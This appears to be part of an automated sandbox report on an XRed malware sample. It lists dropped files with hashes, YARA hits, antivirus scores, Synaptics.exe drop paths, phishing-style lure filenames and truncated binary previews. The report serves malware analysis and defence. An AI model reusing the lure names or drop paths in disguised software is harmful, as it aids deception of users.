                                                                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.0.2.9.2.0.2.0.5.3.9.5.7.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.0.2.9.2.0.7.1.0.0.8.2.0.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.1.8.e.4.e.4.d.-.e.c.9.4.-.4.2.5.b.-.8.f.1.6.-.2.3.e.7.4.0.6.4.1.6.c.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.5.c.4.6.a.f.9.-.9.1.0.f.-.4.8.5.d.-.9.b.1.a.-.0.d.f.f.e.8.3.2.a.2.2.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.y.n.a.p.t.i.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.7.8.-.0.0.0.1.-.0.0.1.4.-.1.1.7.5.-.3.4.0.c.a.8.5.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.9.9.a.1.3.7.d.5.9.3.d.d.a.9.d.1.5.8.d.c.8.b.6.b.7.7.2.0.d.e.b.0.0.0.0.1.f.0.4.!.0.0.0.0.6.c.2.b.a.a.7.2.e.a.5.d.0.8.b.6.5.8.3.8.9.3.b.0.1.0.0.1.e.5.4.0.2.1.3.f.4.a.a.f.!.S.y.n.a.p.t.i.c.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.
                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        File Type:Mini DuMP crash report, 14 streams, Mon Dec 30 10:46:43 2024, 0x1205a4 type
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):2804156
                                                                                                                                        Entropy (8bit):1.9639427422256246
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:6144:M7U+MT9D0gGXk/79xKABYGGknHw97srxmjhqHra5K7:M7UZD0xXk/79/hGkHDxmjhqv7
                                                                                                                                        MD5:74D5FB0F64C958AE25C0EC26319882B7
                                                                                                                                        SHA1:DB990B481C9D8AC29899B542AD0C6A6547EC8513
                                                                                                                                        SHA-256:8224F501C3A780550881F61DBAB0738097FDABB852205A907A0D4841E5954127
                                                                                                                                        SHA-512:DD24A81455F4F31DFA743C566B6AF7A7E51921EF04AEC8689298D3FB9F3C7C1E76491CDC8B259C09B78B9E8C97842616894A7F8C5BDBA4A8EA0F2552B38BB8BF
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:MDMP..a..... ........zrg............T%..............\,.......c..r...........T.......8...........T.................)..........L...........M..............................................................................eJ.......N......GenuineIntel............T.......x....yrg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):6310
                                                                                                                                        Entropy (8bit):3.7139356200272085
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:R6l7wVeJsxM6WycZYirJkfVpDb89b/jsf/1m:R6lXJb6GYGJkE/Ifg
                                                                                                                                        MD5:21404265B7832BF704D2D5D6BE96DA0E
                                                                                                                                        SHA1:C93EA74B8E1B637A6E189879DC39FCF9283E390C
                                                                                                                                        SHA-256:B53081DA28FE5778FDBBED4D3B6D4FACF9F52832B9087ABA048F8C5656BEFE38
                                                                                                                                        SHA-512:B8394B77EE35586BEC6F74E11FCA805EFD39534DD7C42892117F909DE569C0597ABEF6F866BC65A94142B072D579FDA12A75CFA12A5AF8EA0481DC6EB1EFD00C
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.5.2.0.<./.P.i.
                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):4580
                                                                                                                                        Entropy (8bit):4.437259739835017
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:48:cvIwWl8zs9Jg77aI99KWpW8VYZfPYm8M4JFFFoJo+q8ZFc5Zad:uIjfXI7/r7VUfSJuJoQmZad
                                                                                                                                        MD5:0798D3542D0188FF0EE8CF5FF316D579
                                                                                                                                        SHA1:6CF9277ACC33BF14CE42440B2C3E15C35D0A1DCD
                                                                                                                                        SHA-256:A81FE5C976732234CEB16FBF0498245B9928CE9F4FAC230FB3282AEDB5A54A88
                                                                                                                                        SHA-512:B5DA6177FF0CBEA1C564C40F7EA643059890D39BBFB199BF259B8CEA084062D793F53DF7E17FD669E7678909E15492342842D11365552332BD2BFC9432B3A2AD
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="653869" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                        Process:C:\Windows\Installer\MSI4755.tmp
                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):771584
                                                                                                                                        Entropy (8bit):6.638013190381294
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9ICXr:ansJ39LyjbJkQFMhmC+6GD9x
                                                                                                                                        MD5:ACA4D70521DE30563F4F2501D4D686A5
                                                                                                                                        SHA1:6C2BAA72EA5D08B6583893B01001E540213F4AAF
                                                                                                                                        SHA-256:449B6A3E32CEB8FC953EAF031B3E0D6EC9F2E59521570383D08DC57E5FFA3E19
                                                                                                                                        SHA-512:DA806BD4AC02C45C17ED5D050428B3E7B15E8F148ACB156CFB41EAB3E27C35FA91AB1A55D18C6EF488A82D3379ABF45421432E2EFAF2FAE4968C760D42215A7C
                                                                                                                                        Malicious:true
                                                                                                                                        Yara Hits:
                                                                                                                                        • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\RCX49C5.tmp, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\RCX49C5.tmp, Author: Joe Security
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                        Joe Sandbox View:
                                                                                                                                        • Filename: New PO - Supplier 16-12-2024-Pdf.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: Purchase-Order.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: hoaiuy.msi, Detection: malicious, Browse
                                                                                                                                        • Filename: 222.msi, Detection: malicious, Browse
                                                                                                                                        • Filename: Machine-PO.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: 222.exe, Detection: malicious, Browse
                                                                                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                                        Process:C:\Windows\Installer\MSI4755.tmp
                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):1723904
                                                                                                                                        Entropy (8bit):7.463863136848696
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:49152:gnsHyjtk2MYC5GD8hloJfCAh9RMUBrNUFqtBZlO:gnsmtk2a1hlPERBsiTs
                                                                                                                                        MD5:71386F37F17778126296CA734975DB6D
                                                                                                                                        SHA1:353818DCD74D06565FC0E8AC4416E594D29ECD0B
                                                                                                                                        SHA-256:C1317DA0FD0DC3D73B38634EA586016F6F651F52ACC576FBAE8B82721C83E9AE
                                                                                                                                        SHA-512:E5E0D87F91611BCCFEA16222C9AFB7AC7B949F1762244CED01F9D8A78E2C992CFE8C1FAAF1391F4CF107604A0E9F7A64FA4ADDA1C339D8DC85B27E7BE610B83C
                                                                                                                                        Malicious:true
                                                                                                                                        Yara Hits:
                                                                                                                                        • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                        Joe Sandbox View:
                                                                                                                                        • Filename: 222.msi, Detection: malicious, Browse
                                                                                                                                        • Filename: 222.exe, Detection: malicious, Browse
                                                                                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@..............................B*......0....................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...0...........................@..P....................................@..P........................................................................................................................................
                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):1652
                                                                                                                                        Entropy (8bit):5.268209015821757
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:24:GgsF+0FDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+WD+pAZewRDK4mW
                                                                                                                                        MD5:73C5FFED8CAFD1FD4F9FDC11FCACE53B
                                                                                                                                        SHA1:DBA8D1B1362D3C92E416E58F221D62E2BC68FDBC
                                                                                                                                        SHA-256:D6434420B2D164D61BBAEE79467DFB5C77A1138B85CAF58A87AD9064F5114085
                                                                                                                                        SHA-512:BBAB9A2068BF37E2AFE5D34A144ACDA25DB5706495725C1BF5091E9EC796A253CFB1EDC0A6F430CB5A09BEAEBDEE6353C650E0A2D53A0BB95948FE33B62A269D
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="3DEwX24GRnFcA5Rhz5zMXA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):1652
                                                                                                                                        Entropy (8bit):5.262844817677028
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:24:GgsF+0wwSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+o+pAZewRDK4mW
                                                                                                                                        MD5:BBB0082280571362DFA811D32498B36B
                                                                                                                                        SHA1:C3D1A5E9826B77BD55D1DD6DA5844DE7599FA1F3
                                                                                                                                        SHA-256:B9D8E7BFDF337C209694E0B5D2AD6D992A9BC3AEE8DB4E6CC62303126A737E06
                                                                                                                                        SHA-512:9AFF0EFBCCFD0500F7F7AD86F354D7D8B09D124B51046CE0A8680D6D7B82253A33E0D256E18484443A9123EDBA88B19C29F7C0BE826C1599247D4A7AD18F885A
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="3UX4egE8OcHvK-FpsDtZEg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):1652
                                                                                                                                        Entropy (8bit):5.261141930794047
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:24:GgsF+0yDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+1+pAZewRDK4mW
                                                                                                                                        MD5:88471E78E5BF0E7FC932ABA8411F0919
                                                                                                                                        SHA1:C3654B98186A1CED72EC8114EBD35958F669C07D
                                                                                                                                        SHA-256:DDC680217EC24AE2B85C4EFA22B8CB623A64ABFBE815CE6B4B123E284AC2E1A8
                                                                                                                                        SHA-512:B68FD75D2D50F203BC5D6B80118CD49569C3B58F5A5CCFB741B7FC9F6BFD76428E42761BD8F1968C6BB312978EDB10B510E93CC5E9F6BECE423091F74E238A56
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="R0QtUJV0-psS49v48dIPkg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):1652
                                                                                                                                        Entropy (8bit):5.2632697366260555
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:24:GgsF+0GZQSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+4+pAZewRDK4mW
                                                                                                                                        MD5:E81DEF5E8095E2B0B8205726CD75AF20
                                                                                                                                        SHA1:31B7E3E8311C98361C021D8F5C0DE76E86AE5F38
                                                                                                                                        SHA-256:A9E310AE8F0806F47620B3B28DCDD65108AAE71215D8C97C6C673352D52A7585
                                                                                                                                        SHA-512:718C313091078322BA3904473D8EF22D42F2BA729A65BCD1A32AF71FCD14B024C5EE252F688F3AE0D160D0B4D6B57F19B2D6A7930312D39907422651AA355AB5
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="BysKAMdPjEwM0qZaR_dmiw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):1652
                                                                                                                                        Entropy (8bit):5.271021134622485
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:24:GgsF+0QSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+j+pAZewRDK4mW
                                                                                                                                        MD5:46BF97755F9BFF97DD2073D512E52340
                                                                                                                                        SHA1:4B74D49E99BFFC8D6838FA15596E847085F11903
                                                                                                                                        SHA-256:2B9BF9F9DA32EFFF9C8751AEA98114BF2FC5CE4A85413EF7CD6D96CEB7AC462D
                                                                                                                                        SHA-512:B7BDFB446AA386608D7D37779EE0466BE2ECFB6DF560CADFB5F7ED8F279D2E42FE12E2C9608E588B69DF9A256097130505EE4DA8AB7ADF061CE8C1386C8D3639
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="hxv1FPtvPOYX-5TD0DIuSA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):1652
                                                                                                                                        Entropy (8bit):5.267347345220141
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:24:GgsF+0iSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+5+pAZewRDK4mW
                                                                                                                                        MD5:8E247D5DC0230B3F16D9587160BE7006
                                                                                                                                        SHA1:928E8D8BA374C51E1AD66DF847B69464CB86B888
                                                                                                                                        SHA-256:354926CDE6B7CDFA5305BA5B653D43A9E7FE2E761C653098CBFC833EBDF30ADD
                                                                                                                                        SHA-512:4981BDDBADD295CF50F748CA04A59DC4E5090D386DB6A13917E9AB52FF4B27184627A1EA784A560009EE8F99B36228B97692B0AA0760BBF612A9E14AF82FA98E
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="UsLykDQ0wr2T4W59LJFLUA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):1652
                                                                                                                                        Entropy (8bit):5.253105991709949
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:24:GgsF+09SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+6+pAZewRDK4mW
                                                                                                                                        MD5:0F41FC80C491B39EC40D92DB82A66364
                                                                                                                                        SHA1:25499BD042F12F4400BC4AC26DBE368D4B102BB5
                                                                                                                                        SHA-256:735BAB6197E6B98C1B897DC4377D81EC430AF7E5BCAC61839AB02C2A313E912A
                                                                                                                                        SHA-512:FF886F5E78C10D278F15B4207668F1328CA6D66EF17D81BD7E6CF3693EE7EA6046B2BDB2F12738F297F518CAAFF9D5310D49C9BC5C35CFDE5E07E91F9A695591
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="D4LSrgymgxxpIFuqj5m1rQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):1652
                                                                                                                                        Entropy (8bit):5.276411409090153
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:24:GgsF+0ObSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+vb+pAZewRDK4mW
                                                                                                                                        MD5:C0481878DB827C456881F4CADBBE08CD
                                                                                                                                        SHA1:13D42E1FA0BC258CAD9474C17F43AFD5B27ED853
                                                                                                                                        SHA-256:545BAD03D3F6B7CA655BE3EA8092BAABC8A919F287F667CB287B7CDECB14951C
                                                                                                                                        SHA-512:D2475CABD7515596A06C1A993BA984E0B11BDF601DC5B7906D029D7D8C8C691E6D808EE62DD56F1A23BEAC59B6603BC6DE10E9E494B0AA7482638884FB9D3C74
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="X_EkeVCLSUQ6UFxx-DZEgA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        File Type:Microsoft Excel 2007+
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):18387
                                                                                                                                        Entropy (8bit):7.523057953697544
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                                        MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                                        SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                                        SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                                        SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                                        Malicious:false
